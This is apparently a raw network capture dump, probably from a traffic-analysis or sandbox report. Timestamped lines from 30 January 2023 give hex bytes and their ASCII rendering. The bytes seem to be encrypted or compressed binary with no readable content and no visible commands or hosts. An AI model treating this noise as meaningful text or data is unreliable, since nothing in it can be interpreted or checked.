                                                                          Data Ascii: /&?ISVy{:XrV*61(N\r2YLOk`}{@UoDgkPl'xaXl25g|;r+E`=&'[Nf7Chr\M;A\D=IET!Tu@WVmgdH\IP'V6lTuTAvd^?dVTZM
                                                                          2023-01-30 12:39:17 UTC188INData Raw: da 94 67 11 46 ff 62 cf 0b 4c 5d 1f 3f 49 a1 95 88 6a 5f 36 a7 72 72 92 68 11 3a 96 40 73 d9 8b 0f e8 1d 3e cc ae 37 b5 f1 ab 33 69 cd 84 51 5e 2c e0 0a f2 0b cc 82 8b f4 6d 2f a9 95 b5 4f 53 54 09 fc d5 5b c4 e5 39 c8 62 8f 4d 76 ae 0f 16 be fc e5 a0 71 5e bb 81 75 33 9d 7b 0b a7 c2 63 e8 51 ff eb e1 94 ca fe c1 e2 4a c1 e2 3f 24 dd f6 55 52 6c f2 38 d0 01 0d c7 bf c3 f9 e1 8e 82 f9 09 d6 c3 77 3e 1c a1 f1 4f 8a c5 63 53 16 06 27 db 0c 71 92 6e cf 80 1d 0f 16 0f 54 d9 11 96 c8 20 13 b2 4d 7a 6f b5 f1 08 37 72 f4 33 5c 3f fc 27 35 c8 52 7e 4c 03 40 70 8c 20 5c 7b 3b ca 24 1d 24 b3 7d a5 bb 1e df 7f ef d0 ca 58 92 3d 8a 93 a3 56 16 2a 32 ec 27 73 85 df 7a e5 99 bc 4a e8 ca 23 53 e2 1a d2 a6 28 26 05 75 2e c7 0f ad 39 19 ac 8a 36 05 50 ca 9c 17 8e 5b ea 32
                                                                          Data Ascii: gFbL]?Ij_6rrh:@s>73iQ^,m/OST[9bMvq^u3{cQJ?$URl8w>OcS'qnT Mzo7r3\?'5R~L@p \{;$$}X=V*2'szJ#S(&u.96P[2
                                                                          2023-01-30 12:39:17 UTC195INData Raw: 9f 4d b4 fe b7 18 0f 4b 1d 12 11 dd c1 0a e9 6e 47 f0 96 89 d7 4f ca 99 4f af 3a ba 33 04 91 f4 a4 cf e8 0a 94 e1 9c 18 75 89 4d 14 96 7e ad e8 07 98 28 2d 30 88 ab b5 4c a3 da 19 93 81 a0 15 14 d1 d5 31 ba c5 1e 70 aa 69 b3 69 ac 50 a4 0b 54 60 e2 8d 95 43 45 fd b1 2f d6 91 23 72 e4 10 45 70 02 9d 55 76 99 16 f5 98 c4 16 ae 59 b5 71 e4 0e 9a 54 c2 d6 42 7a 52 6f 8b 3d 2d a7 30 5a cb d1 d6 2f 4c 41 2e 1b 80 e4 33 29 c1 bb 9d 69 b3 a0 d4 69 b4 1b 7f 33 65 25 8d f2 72 f9 86 aa b9 df 73 e1 d8 33 e3 16 79 0f 9b da 25 51 4b e0 f6 21 be 9d b7 08 2c 6e b8 4b f7 12 7a 33 82 17 2b 3d 9e eb 5d 81 b6 03 46 9c 5c 91 c7 eb 34 6e c8 2b 58 05 13 6a b7 99 28 8d 3b 6e 81 6c 80 a8 af 74 5d 32 08 97 e2 c6 f6 ff 68 9e d1 16 7a 93 23 6f f8 e7 8a 31 37 33 a3 75 10 0e e6 c4 d8
                                                                          Data Ascii: MKnGOO:3uM~(-0L1piiPT`CE/#rEpUvYqTBzRo=-0Z/LA.3)ii3e%rs3y%QK!,nKz3+=]F\4n+Xj(;nlt]2hz#o173u
                                                                          2023-01-30 12:39:17 UTC203INData Raw: eb c8 47 5d ea 53 e1 7e ef d3 6a d5 23 8e 2f a9 6c c2 4b 0a 30 62 7b 81 c6 82 6b 1a fa 8e 07 40 7a e0 46 54 b3 06 73 1d b9 32 7b 88 63 7a bc 3a 97 16 86 a1 33 d3 cb 4a 34 ee c5 e0 68 0c 05 67 60 b9 06 5c 36 dd bc 60 8c 56 e4 15 9f dc c4 35 45 dd 6c 86 da 42 f5 0c e0 10 80 a3 3e ee fd 51 67 3b 0d c9 5c 92 ec ff 23 6d 49 00 3f 62 b7 bf cc 25 8f 4c 0d 7a 17 16 57 c7 a4 7e 68 b6 dc 96 39 05 fb 1b d1 ab b1 09 e0 04 09 3e 11 2f 44 79 b9 82 47 8d 3c 61 e7 5b 2c 2c 07 92 e0 c3 07 77 9a d5 2c 1c b3 50 8f 63 fd a6 b5 d6 6b d0 9d 9c 0e 9c 85 e8 bc 37 3f 7a cd 36 6b 2c 7a f2 bc f6 00 23 aa a7 b5 21 ef 60 71 8f 62 a3 2d 57 00 7b 74 d3 8a cd 49 23 99 17 47 4e 4e e0 d1 90 be f1 3a 6b c2 cd ff 79 3c b0 5e 72 ca ea 70 08 c8 d6 c9 7e 60 f0 1c 4f d3 84 8e bf d1 7a 10 8a 72
                                                                          Data Ascii: G]S~j#/lK0b{k@zFTs2{cz:3J4hg`\6`V5ElB>Qg;\#mI?b%LzW~h9>/DyG<a[,,w,Pck7?z6k,z#!`qb-W{tI#GNN:ky<^rp~`Ozr
                                                                          2023-01-30 12:39:17 UTC211INData Raw: f4 e4 ac e4 17 3c 63 cb 6b 63 19 b2 c4 51 d7 df 4b 05 86 bd 21 e4 9e 2e 24 2a 7e 9d b3 f5 ec 45 22 17 31 92 3b 4e 84 cf 2c 1c 08 1b 9a 5e 14 4f 9a 3a 5c d1 61 b4 c1 90 d8 ee a5 42 c3 6c 4d d1 dc 41 52 46 01 69 45 15 07 4f 4b c3 01 97 2a 8a 32 bc c5 bb 33 0e 3c 6d ea d8 e5 eb 94 0a d1 e5 fd 05 8f 2c ff 4f 51 82 18 24 b5 ae 32 a1 96 50 bf c3 14 4f 8d 6e c1 3e 8b 9a 52 91 51 32 17 45 02 0c 67 62 3a 03 f8 f8 88 4f 8d 80 ac b8 4b 0a 9b 61 17 41 a4 4e ef 8b 10 dc f0 8c 58 54 e1 4d 6a 1b 37 61 57 ec 27 2d f7 c2 0b ee 16 f8 53 71 cb 45 9a 9f d3 01 d8 db ea 3f 2e 4a dd f0 d7 1d 21 bc 94 9e d6 80 a8 25 a7 cd 6f 08 cc 5f 1f 5d 36 09 57 6b 95 3c e1 bd f3 6e 54 c2 bd 78 45 7b ef 5b cf ac f7 e3 39 50 b3 1e 8b 3e 45 41 98 ea 2b 84 49 2d 50 5b 76 06 27 e0 c7 53 a4 b8 e3
                                                                          Data Ascii: <ckcQK!.$*~E"1;N,^O:\aBlMARFiEOK*23<m,OQ$2POn>RQ2Egb:OKaANXTMj7aW'-SqE?.J!%o_]6Wk<nTxE{[9P>EA+I-P[v'S
                                                                          2023-01-30 12:39:17 UTC219INData Raw: 53 2f 36 cf 31 b5 60 00 0f 48 b2 58 18 d0 e7 38 bc d9 1f dd 4b 93 70 b4 c3 04 a6 9c 62 47 d6 5f 94 c3 27 a2 fa a7 0b b1 ef 1e bc f0 fd ba d9 18 24 12 a9 38 1a b1 0f ad e0 c9 0a 5d 13 16 9b 1d 98 c9 81 82 34 96 3e 39 33 9b 25 43 95 94 e4 b2 27 b4 d3 70 51 71 f2 f1 eb 40 be 82 ad d0 01 19 ac c8 7d 0a 6a 66 9e 36 ba 27 a4 e8 2f ef be 74 5e ee bf 65 2a f5 a1 21 80 53 52 e5 1f 08 20 e5 e2 4a 00 30 10 d3 27 28 60 1c a6 dd 81 f5 cb 4c 73 a1 c1 4d 35 f4 54 01 ea ae b9 c9 b7 86 4b 81 a2 e1 2e d9 65 f7 92 ba b9 84 3a 08 83 b2 ff 18 4d 83 72 f0 38 67 b7 7a 20 ed 50 cf 23 9c f6 88 a8 39 c1 5b f6 72 20 2a bc 62 d4 e3 21 60 ec c6 3b 49 ed 31 0d 1d 72 49 fb d2 25 21 7d 91 ae 59 6a 59 fb af 3b 9a 47 57 69 94 cf a7 c7 f7 c6 6d 5b 5d b1 be 82 a7 c0 10 eb 3a 46 d7 37 6f 26
                                                                          Data Ascii: S/61`HX8KpbG_'$8]4>93%C'pQq@}jf6'/t^e*!SR J0'(`LsM5TK.e:Mr8gz P#9[r *b!`;I1rI%!}YjY;GWim[]:F7o&
                                                                          2023-01-30 12:39:17 UTC227INData Raw: 5e 33 93 40 f2 52 a0 53 22 92 ed 85 1e 57 16 73 3c 6b 10 ce f6 58 bd 6e 54 d4 e0 dc c3 44 5d 25 a8 5c 40 2e b8 ce 67 d1 c7 c4 06 fe d0 58 11 fb 28 56 65 e2 ce 22 25 6b 5f 7e 72 8b 9d 84 e8 25 ce ca 97 33 77 91 a7 bb a5 cc bb 08 67 53 0f 9b 2c ac b1 d0 d8 a9 11 13 93 6a b0 d8 a0 25 d1 3a 07 24 01 0b 76 a2 f5 5a 6b 02 6d fa 5c 6a ae 94 17 b3 39 14 ce 02 f1 1b 3d 04 b4 ac 17 0a 74 e3 ad 3e e8 9b 65 d6 30 98 82 89 39 c3 f7 2b 70 96 ea b6 e9 51 bb ff 12 75 72 38 d1 82 5a de f5 eb 78 08 2d d9 08 7b 74 bd 4a 6e 53 25 07 22 00 d9 3e 8a 0c 4b fa e4 6e 74 b6 bf 9b fc 24 aa cf ea a5 d3 14 23 5a d8 64 6b 12 2b 6f 1f 68 c1 87 a9 68 b9 15 89 c8 a8 00 ab 19 02 04 e9 3b f8 cc b4 b5 05 92 a2 71 b5 ba 1d 7d f7 49 ad 0b 85 98 11 39 f6 73 96 ae d5 a2 d0 f1 35 ed 5e 93 92 df
                                                                          Data Ascii: ^3@RS"Ws<kXnTD]%\@.gX(Ve"%k_~r%3wgS,j%:$vZkm\j9=t>e09+pQur8Zx-{tJnS%">Knt$#Zdk+ohh;q}I9s5^
                                                                          2023-01-30 12:39:17 UTC234INData Raw: 81 a9 5f cb 95 6a 5f d3 4b d2 d7 a9 27 32 6e 46 a1 ce 81 fd 3b f4 0b 0d a9 2d cd 1f 73 42 3c fd d9 fc 40 26 2b e0 14 ec 98 f2 cc 8c e3 36 43 12 6e 09 46 6c ec db 50 19 28 62 2a 8a 7d 15 c2 30 5a ec 6d 35 ff aa 1c 55 a5 62 c2 7a 5e 0e 66 33 2a 46 c6 10 19 f0 58 66 e7 1e f3 ab c1 5e 86 c1 12 b9 cc 2d c1 d3 1e 22 db d2 6e 32 54 97 e5 c6 84 c0 50 ad 60 e1 32 33 1d 4d 53 6e 63 0d 4e 1a da 13 ca 19 83 c1 70 5d 72 ac 29 04 0e 11 65 91 74 39 60 c7 3c 90 56 a9 b2 a1 bc 24 d5 c5 23 40 5e f0 fd 77 8d f0 27 41 c7 c6 77 42 2f 7c 2c 6e 3d 2f 06 02 d5 8e c0 51 8d f2 ac 8e bd 1b 95 93 63 0a 68 54 a1 40 f2 7f 88 99 bf 37 47 af fa 20 bc 9a 0f 8f ac 8a 54 d5 a6 a6 37 00 e2 fe 45 63 25 c3 1c 94 42 1e 70 42 8d 6f 59 20 22 5c 68 d7 7b 01 d9 c0 e4 b2 33 9d 39 ba 16 78 1a b0 50
                                                                          Data Ascii: _j_K'2nF;-sB<@&+6CnFlP(b*}0Zm5Ubz^f3*FXf^-"n2TP`23MSncNp]r)et9`<V$#@^w'AwB/|,n=/QchT@7G T7Ec%BpBoY "\h{39xP
                                                                          2023-01-30 12:39:17 UTC242INData Raw: 0c 2b cc a8 54 ce eb 10 66 fb 43 ae b0 53 a6 1e e7 c5 5c 52 81 9c b0 a1 57 00 e2 51 fe 24 0a cd b2 20 02 e7 85 14 93 d7 2c ce e1 43 b7 82 62 23 e0 79 2c 13 94 d5 c3 3f c2 6f 97 6e 11 7c 9f 63 f7 03 21 84 ed b0 02 b0 66 13 8d cd 73 9b d7 b4 06 80 4c e7 3d a9 50 98 ee e3 5e 88 2d 15 dc 98 5b af c4 3a 63 7a ed bb 78 ec aa 93 68 a2 61 7c ea 06 c3 9c aa 7d 34 fe b2 d5 23 c6 e9 d5 1e 7a 4e f3 ed 8a 03 c2 44 72 fd b9 a9 99 29 52 62 8d 6f c9 8b 7f f6 6c 3f 1f c2 b5 f6 ec 67 79 a4 a4 47 09 0b 7d 45 9d d5 43 1c ca 95 2a 4a 6a 3f 00 98 e3 a3 9e 5e 0b 0c b3 6d 8e b4 23 be 2b e2 5b ce 26 10 b1 b8 07 10 aa 4a f3 51 b8 cf 25 1f db 38 02 00 b7 51 99 76 03 b6 1f 31 89 ed 10 c3 94 cf f0 3a 08 d4 d3 57 79 48 d2 4c 03 1a 58 40 bc 58 0c 9b b4 e3 0b c7 70 20 03 fc 33 9d 28 f9
                                                                          Data Ascii: +TfCS\RWQ$ ,Cb#y,?on|c!fsL=P^-[:czxha|}4#zNDr)Rbol?gyG}EC*Jj?^m#+[&JQ%8Qv1:WyHLX@Xp 3(
                                                                          2023-01-30 12:39:17 UTC250INData Raw: 99 2c 3a 38 4c df 99 68 d0 22 10 73 ca 7d 91 28 be ad 18 fb 32 73 95 d2 21 92 60 2d 70 e3 06 8f 1c c5 2f 66 b9 90 74 d0 9a ca d7 f7 02 3b 76 c3 0f 8e 65 ba fa 74 b3 f5 4f 79 f4 ce ea d7 f4 0f 6b 6b 22 0f a0 29 91 2f 04 0f 42 90 bf 11 5e a0 2b 49 6e de 59 d0 0d 4d e8 12 73 cc b3 ac 35 62 be 9c 5c 3f 33 7b 8d 3b a4 89 4d b1 ec b2 27 f2 65 3a 44 f9 5c 3e 81 74 6b a5 0a 4d 41 b4 1e 48 45 c2 78 dc df cf a7 a0 80 e7 09 55 da e5 de 24 e2 0a 9d 83 ac 63 98 92 22 86 9e 3b 7f af 33 cb 89 1f 2d d4 bc 9d 52 3d 4f 26 7b 69 86 9b 76 d4 e3 e0 10 d0 43 21 04 45 91 5d 37 2e ea 46 50 66 fc 43 8f f6 2a b9 eb 49 6f 56 43 24 04 5c 1b e6 70 81 37 2f 4e 4c a3 d6 83 6d 06 b0 70 cd 4e 1a 96 88 71 fa 57 3c 4d 3a 63 0e cb 85 f4 69 3a b6 70 7c 54 03 b3 ba 48 c1 ba d9 48 4c 03 d8 02
                                                                          Data Ascii: ,:8Lh"s}(2s!`-p/ft;vetOykk")/B^+InYMs5b\?3{;M'e:D\>tkMAHExU$c";3-R=O&{ivC!E]7.FPfC*IoVC$\p7/NLmpNqW<M:ci:p|THHL
                                                                          2023-01-30 12:39:17 UTC258INData Raw: fd c3 c4 32 69 3a 88 ee fa af 1c 8b f4 31 8b aa 52 2f 47 de 4f 85 2d 78 13 fb 38 11 71 23 2c e3 d4 f6 52 44 16 e7 72 21 59 06 ec 0f 4d d3 73 c5 6a 00 3c d3 c4 54 27 c0 64 28 90 d7 5d b1 58 2e 11 01 20 5a 55 aa 54 e3 8e ed 2f 66 c5 2e f2 fc 1b 37 64 ac 93 b9 78 d2 ab 46 c9 66 8a 29 ae 49 67 fe 9d c8 4c 41 19 93 86 a1 70 e5 20 08 52 6e 06 c6 65 6f 06 c5 5c 59 7c 27 7c c2 15 0a ee 9e fc 0d f0 b0 14 ec bf 85 9e fc 16 2d 86 2f f4 59 28 1c 78 c3 50 6e c6 92 5f a5 2f bd eb 56 53 0d e6 93 cb fd bd 58 aa ff 40 62 43 19 48 5a 72 25 6e 2e eb e0 37 9d 23 8a 8b 99 f4 13 d8 f6 d1 97 ad af 36 b7 ff d7 66 62 61 22 f0 93 02 02 e2 36 30 d1 f9 e0 7d df f9 f2 ef 38 3b 4f b8 55 f5 53 37 e4 e7 e0 a9 50 f6 54 1d e8 3e 65 ac 57 d1 68 24 a5 f1 24 37 83 f2 c3 5a 46 bc c3 c4 d1 b0
                                                                          Data Ascii: 2i:1R/GO-x8q#,RDr!YMsj<T'd(]X. ZUT/f.7dxFf)IgLAp Rneo\Y|'|-/Y(xPn_/VSX@bCHZr%n.7#6fba"60}8;OUS7PT>eWh$$7ZF
                                                                          2023-01-30 12:39:17 UTC266INData Raw: 80 ac e5 62 4a 15 a0 70 fe a5 69 81 c1 ea 32 09 62 7a 66 7e e6 f1 f8 ee 82 c0 f3 2a 79 ca df 3d 54 30 e4 bf c6 3a 8a a5 83 54 81 1b f1 d7 db 8c fd 3f 2a c3 44 7c 5c e8 5a b5 6f ef 94 cf 86 b4 ff ea 27 ae 22 11 36 eb 01 8d 17 71 33 48 9c 74 a2 65 a7 a0 05 6d af 21 32 e8 52 72 2a c2 1e 30 27 31 1e bc 1c 67 02 78 0f aa bd a7 0f 07 5f bd 6f 01 62 75 a0 d3 0a 46 9c 20 3d eb a6 79 9f 8d 35 74 2a c5 51 b2 e3 59 d4 49 ad dc f6 76 ae 09 a0 e9 bb a5 43 52 60 01 9c 19 04 ed c7 d4 fd 47 07 f8 6f 7b 59 59 b3 43 09 de ac 8f 28 c1 5d d8 cf e9 6b 21 fb 69 73 6a c1 b4 59 3c 01 42 fb f7 17 54 60 82 70 cc b8 60 30 2b 31 11 97 a7 f9 92 c9 02 48 5a d2 b4 cc f9 b8 90 dc 0c 90 04 77 c8 b9 b0 20 de 9d 67 97 ed 2c e2 6e 10 6d 73 b5 9a 7d a1 ff b7 53 44 fa 22 b6 9b 97 fb f4 40 6f
                                                                          Data Ascii: bJpi2bzf~*y=T0:T?*D|\Zo'"6q3Htem!2Rr*0'1gx_obuF =y5t*QYIvCR`Go{YYC(]k!isjY<BT`p`0+1HZw g,nms}SD"@o
                                                                          2023-01-30 12:39:17 UTC273INData Raw: 25 f7 a7 5c 6a 59 c7 72 25 53 60 7c 87 fb ba ad 15 0b 7e 53 1f 18 1d 43 1b 53 d1 76 79 6b c9 af f6 fd 13 69 85 8d 2a 22 d9 26 4d 36 77 00 5c 7e ee 60 8f af 17 33 34 85 ce 6f c0 2c fe 10 ec 40 f4 94 95 83 53 0f 3e fc d1 97 3a 29 0c de f7 4b 34 3e e5 a5 74 f1 dd ac b6 66 96 af ea 00 05 9b 68 4e a5 f5 8e 78 00 4b dd 23 dc 85 b9 5e 36 6c aa cc 85 1c aa c4 4d 49 6c 3f a3 63 60 85 23 87 66 f8 29 15 d9 d6 fe 72 a7 01 4d 24 ca eb dc e7 2f 3f 7b 89 8b 09 17 9c 1b 87 3a c4 15 18 6f 56 dd 68 66 63 bf 1c 96 1a 5a b5 a8 b4 e1 3b 1d 67 f8 b4 6b b5 d3 bc b0 e1 e4 5f aa 93 b3 8a ab ab 9b 32 bf 17 b8 43 02 e2 95 19 e7 5b 79 af f0 cb bc ec 21 ef cc f0 9a 30 a1 00 e7 25 3f 83 47 de 9c 30 75 91 35 4c 40 d8 09 49 e3 84 c0 42 13 4e 08 35 e4 f9 74 2e b6 7b f4 a8 06 c1 61 be 93
                                                                          Data Ascii: %\jYr%S`|~SCSvyki*"&M6w\~`34o,@S>:)K4>tfhNxK#^6lMIl?c`#f)rM$/?{:oVhfcZ;gk_2C[y!0%?G0u5L@IBN5t.{a
                                                                          2023-01-30 12:39:17 UTC281INData Raw: 38 a4 d4 35 5e 54 82 5b c3 55 8b c3 96 27 ce 35 c7 1a b1 24 ce 3c 49 f4 2a e8 82 ef 64 19 c0 2b 4b 2a ea fd 01 3f ac cb ab 60 3a ad 27 d9 cd 63 51 66 f9 2d 0a 48 13 c7 aa a1 96 c3 d9 f7 3b f9 ca 7a 3a cb a5 b1 14 ab ba e6 a7 65 30 e3 d9 46 68 a1 11 c8 9b 74 57 bb 79 dc d3 51 66 c2 98 20 92 6b 83 8f d2 51 83 b8 4a 4b 5b c1 98 96 69 f3 45 75 37 00 73 3f e8 e0 05 dc 1b b7 b2 cf b1 92 3a 51 5a bc fa 38 53 75 25 01 fb fc 20 14 11 3a 24 9c 76 a7 5e 08 f8 f0 56 42 1a 19 1d aa 8d 70 bb 3c b1 48 c5 f4 fb 09 26 12 2b 26 ef 4a 1f fc de 9c c2 a4 fe c7 ca 40 cf 8d 7e 25 49 8e 9d b0 e5 76 05 46 50 ee 2c f2 2b 95 9e a9 f3 3a 3e 33 da 5e ba 10 69 20 4e 0c 0e cf d3 cc 15 19 30 1b be 66 d8 55 8d a2 8f 90 bf 77 9d 03 60 0d 21 a1 7e e3 e7 db e4 c1 ee 80 ea cf 72 f0 b2 93 9e
                                                                          Data Ascii: 85^T[U'5$<I*d+K*?`:'cQf-H;z:e0FhtWyQf kQJK[iEu7s?:QZ8Su% :$v^VBp<H&+&J@~%IvFP,+:>3^i N0fUw`!~r
                                                                          2023-01-30 12:39:17 UTC289INData Raw: b3 25 23 78 c7 c0 97 af f9 3e 2b b7 c3 73 06 b1 86 52 9d 7b 3f 60 aa ac 38 0d 8e f3 5b 79 0e 2f 08 57 ed 61 72 bf a0 22 e9 e6 83 9e e6 18 a1 0f e8 5e 67 63 fa e7 64 85 04 89 13 0e cf b2 cb 00 14 9f 4e 1d d1 62 ad 41 02 bb 56 f6 4f 34 29 98 0e 6c 15 e3 25 d8 2e 05 1a 02 24 45 fc dc fe eb 5f 28 18 66 8c 19 44 1a 98 d4 c2 ae c7 b2 b4 30 8a 99 69 cd 72 02 58 01 f3 5e a8 9b 77 d6 09 2e a3 5b 87 8e 29 bc f8 8d df cb f7 e5 3d 76 23 9c 4c 01 43 9b e5 c1 8f cd 2b 8e d8 8a 05 39 eb 8e e9 ed 71 ef 97 a2 8c fd c3 59 ff 0d fe f0 d8 8f b8 1d 81 65 cb 62 b5 d9 e3 d1 8a 38 b9 04 c5 5c a3 4d 09 40 65 bf 8b 21 46 47 34 38 19 7a 64 8b 59 8e bb d8 ae 80 d0 5f 58 9f e5 d4 cb f9 80 07 4c 56 a7 cf 9f 7f a2 8b 18 e7 c0 20 fc 50 4a f3 98 1c 73 1d 5e a7 af 9e 1b 21 00 d2 db 69 d3
                                                                          Data Ascii: %#x>+sR{?`8[y/War"^gcdNbAVO4)l%.$E_(fD0irX^w.[)=v#LC+9qYeb8\M@e!FG48zdY_XLV PJs^!i
                                                                          2023-01-30 12:39:17 UTC297INData Raw: e0 c7 24 fe 67 fa 6f 2f 7b 92 72 0f a5 6c 3d 13 c5 58 da 67 52 b1 c3 60 67 22 ab f5 e4 50 5a 7f d4 14 a5 72 77 da 5f fd bd 7d 68 fc 0f 13 70 19 4c 7e 32 eb 2c bb fd 17 89 98 37 16 e7 df 88 57 50 f4 89 77 12 47 82 35 c8 62 40 61 2f ca 70 b6 64 9a 69 cf dd 92 84 3d 4a 74 01 6c 5c 2b 61 98 7d ff 37 08 46 62 85 9e 6c d6 44 3f c1 f8 e7 e7 4e 70 4e 8d 39 86 53 e8 bd b8 14 26 9c 6a aa 38 8d f0 8c ba 37 9f fa 31 be ac 99 7b 04 33 ba 04 ee fd 9c 81 14 61 b8 89 93 cc 7e d0 3d 2c 3c 0a be 9b 68 bd 27 04 ab 15 08 b3 d2 83 73 33 26 63 67 26 8f 02 63 48 68 52 d8 42 0f a9 9e 64 71 ff 11 91 a8 fb a1 25 4f 3c 7d 4b 0f 91 8a 12 c8 dc bf 56 bc 2f 0b 91 09 15 4c 37 10 3e 70 c2 47 73 74 1a 8f 7e 08 39 cc d2 fc f7 d6 00 1f c5 41 77 90 ac e2 98 b2 5c 4f 84 28 55 bf ac 67 69 03
                                                                          Data Ascii: $go/{rl=XgR`g"PZrw_}hpL~2,7WPwG5b@a/pdi=Jtl\+a}7FblD?NpN9S&j871{3a~=,<h's3&cg&cHhRBdq%O<}KV/L7>pGst~9Aw\O(Ugi
                                                                          2023-01-30 12:39:17 UTC305INData Raw: f9 4e 09 2e fa 0f 0b 5b df 8d 5d d5 a0 2b 7e da b4 0a 99 9d e0 c2 c1 0f 2f c3 00 e0 55 30 4a ef 3f 03 31 fa d8 f7 54 11 bd 94 33 15 d9 ef f5 b6 40 9e d6 bf cb 58 06 6f 2d 07 4d 85 df 68 14 4d a4 5e 99 0e a4 18 ba 56 60 60 ea 5b 9f 62 ea d1 37 30 09 c7 c5 95 14 07 a2 55 92 4f 0c 69 c7 37 9f d2 da b2 10 4c d8 c5 ea 3c b6 9b 3a da b1 9c 0f 71 94 36 9e cd 9b a9 da ee 2b c6 67 df 9e 9b 4f 96 40 47 c8 b0 89 66 07 fc d4 a4 c8 ea 2d fd 78 ec 34 4d 08 7e 95 0b 5e 94 55 a0 4a 16 7a 40 e1 cf 00 35 9b f0 3a f2 a4 4e b4 6d 99 1d d0 c5 cd 67 81 9a 11 45 7e 1c 40 31 ea 9b 20 8f b1 e3 bf aa 38 0b 96 51 91 49 c2 89 e0 7b 13 ff 0a 9a db 39 c5 b5 7c ce 93 2b e8 a7 0f 2f 26 1f 7f e3 f7 3b 5a 43 7b 9a be cb ed 64 07 06 8b e9 7e e9 6b 7a 57 6f 60 7f b6 b5 7c 85 99 40 8a 7e eb
                                                                          Data Ascii: N.[]+~/U0J?1T3@Xo-MhM^V``[b70UOi7L<:q6+gO@Gf-x4M~^UJz@5:NmgE~@1 8QI{9|+/&;ZC{d~kzWo`|@~
                                                                          2023-01-30 12:39:17 UTC313INData Raw: 73 1a 2f 52 44 9c 64 e1 9e 21 65 cc 81 74 0d 5c 18 b7 ea 1b 4e fb 8a bc 27 95 20 aa b3 e1 15 e0 8f b1 ff 8a 3d f4 7e 2e c5 61 6b c1 2d 4a d0 31 c4 5a 34 f7 c6 a4 6b f5 bf a0 89 77 9e b5 e6 33 fa e9 b7 d9 fe 48 11 54 51 69 19 ca 92 e5 b3 0c 04 03 d4 90 00 b5 ce 51 26 2c 21 fa d4 d9 96 a6 ed ed 0d f5 09 d2 bf 8b 54 8d 4a bc 85 bb 05 22 28 1e 72 72 e9 41 70 f8 4a 23 f8 06 56 dd 77 d2 86 c7 96 5a 4c e6 bc 24 87 69 4b 24 2f f9 fe 20 81 d7 4d 20 52 1d 0f 6d 54 98 28 d4 a3 df 8a 2d fd 10 1a e7 33 05 8d a4 53 ca 94 c0 b1 7f a3 1e 2d 2b a8 10 1f 61 ba fb fc 50 45 61 b4 94 fb 1a d3 88 95 3e 0d 1b f2 8d 6e c3 f7 4f fe 11 9b d6 b2 de 15 d6 6e 90 70 8d d3 7c b9 82 69 ca 3c 34 45 95 6b d6 9a 35 90 af a0 3c 4d 33 28 f4 45 6d b3 63 b4 1e 73 d3 ef e2 81 ee 46 66 c8 06 b4
                                                                          Data Ascii: s/RDd!et\N' =~.ak-J1Z4kw3HTQiQ&,!TJ"(rrApJ#VwZL$iK$/ M RmT(-3S-+aPEa>nOnp|i<4Ek5<M3(EmcsFf
                                                                          2023-01-30 12:39:17 UTC320INData Raw: 08 b2 f9 b5 cd de 8c ad 84 de a0 52 6e 0d 3f 4e 42 2a 35 80 55 e7 89 cc b1 0c 0e 66 06 e2 9c 8b 6c 8d 3b d1 08 b7 ae f2 bd f6 d5 33 1d 19 33 3d ec d3 db 87 db 79 c5 b9 ca 00 e5 da b1 9e 67 bb 64 f7 74 df 53 ec 7c 25 cd ba 1c 28 ab 6a 41 f7 ae 04 e1 33 b0 a6 b2 d7 d1 7e 78 37 6f 93 ef 13 c8 e1 31 5c c8 9b 32 60 4a d5 77 a7 eb 5c 7d 77 c9 2f fd a9 ee 7a 56 74 7f 98 9d 28 14 06 28 57 5d d2 1e 49 3b e7 5d ef e7 c1 15 57 fc 76 e7 6d 5a 52 34 1e 7b 2d 89 b8 bc ee 95 a6 6c 2e 46 c2 ee e9 27 7a d7 00 ae 6c 03 86 e9 2e a5 85 29 8c 4c 73 7e ff 55 b5 7b 25 5e e6 55 3e 5f 2a f0 64 9c c5 ec d0 db a1 18 b5 2a da 3b 53 26 8e a3 2f 81 40 84 41 15 15 37 99 35 f9 c7 5b 1d 8b 78 af f9 29 d6 b4 5e d7 78 c8 96 f3 d7 c7 d8 2b f0 c7 41 4f b6 0f cd ea 69 00 3f 49 f1 ed 42 b3 2d
                                                                          Data Ascii: Rn?NB*5Ufl;33=ygdtS|%(jA3~x7o1\2`Jw\}w/zVt((W]I;]WvmZR4{-l.F'zl.)Ls~U{%^U>_*d*;S&/@A75[x)^x+AOi?IB-
                                                                          2023-01-30 12:39:17 UTC328INData Raw: 12 6a 73 9d f9 d8 04 32 d8 99 4b ad 29 31 71 02 ed 2e 29 10 04 d6 8f 95 c8 c3 fa 19 a8 74 a0 20 cd 81 df 8b ef 43 bc 44 6b 43 fa 5f 5f 3e 79 fb 07 6c 13 99 bc a4 68 2a 59 52 a0 e6 3b fd f9 e4 86 c3 3d 89 91 c6 03 50 a4 cc 4c d5 91 7e a2 6f 6f 4b 6d a5 8a 2f cb 43 48 0e 5f 57 98 e2 42 be 3d 2e 06 fd c8 c5 05 d2 82 43 47 b6 2f 77 f8 25 c4 5e 4b 5b 84 fb 95 e3 b7 03 2d 15 c1 cd b4 f5 22 ad 6b 11 8c 4a 8c c9 71 1f 11 fa 7e 29 d3 ee 63 87 1d b5 c0 82 c3 69 2e fe 64 b3 0b 57 08 ea 8f 62 b0 ba ef 8e 40 ec 3a 8c 9b b0 c7 ea 53 b6 38 e5 39 ba 64 e1 ab 9e 6d b3 fb af 00 d0 2e 8a 9c bf ac ef ce 18 4c 0e f3 d5 02 d0 50 c8 af c3 50 72 40 6e a9 42 c3 c8 71 4b 25 99 01 d0 59 b8 43 b1 72 a5 54 7f b8 81 0a f1 a7 f7 2f aa 64 0b 3f 76 0d 8b 32 dc 01 7f 37 0d 47 95 c9 f6 43
                                                                          Data Ascii: js2K)1q.)t CDkC__>ylh*YR;=PL~ooKm/CH_WB=.CG/w%^K[-"kJq~)ci.dWb@:S89dm.LPPr@nBqK%YCrT/d?v27GC
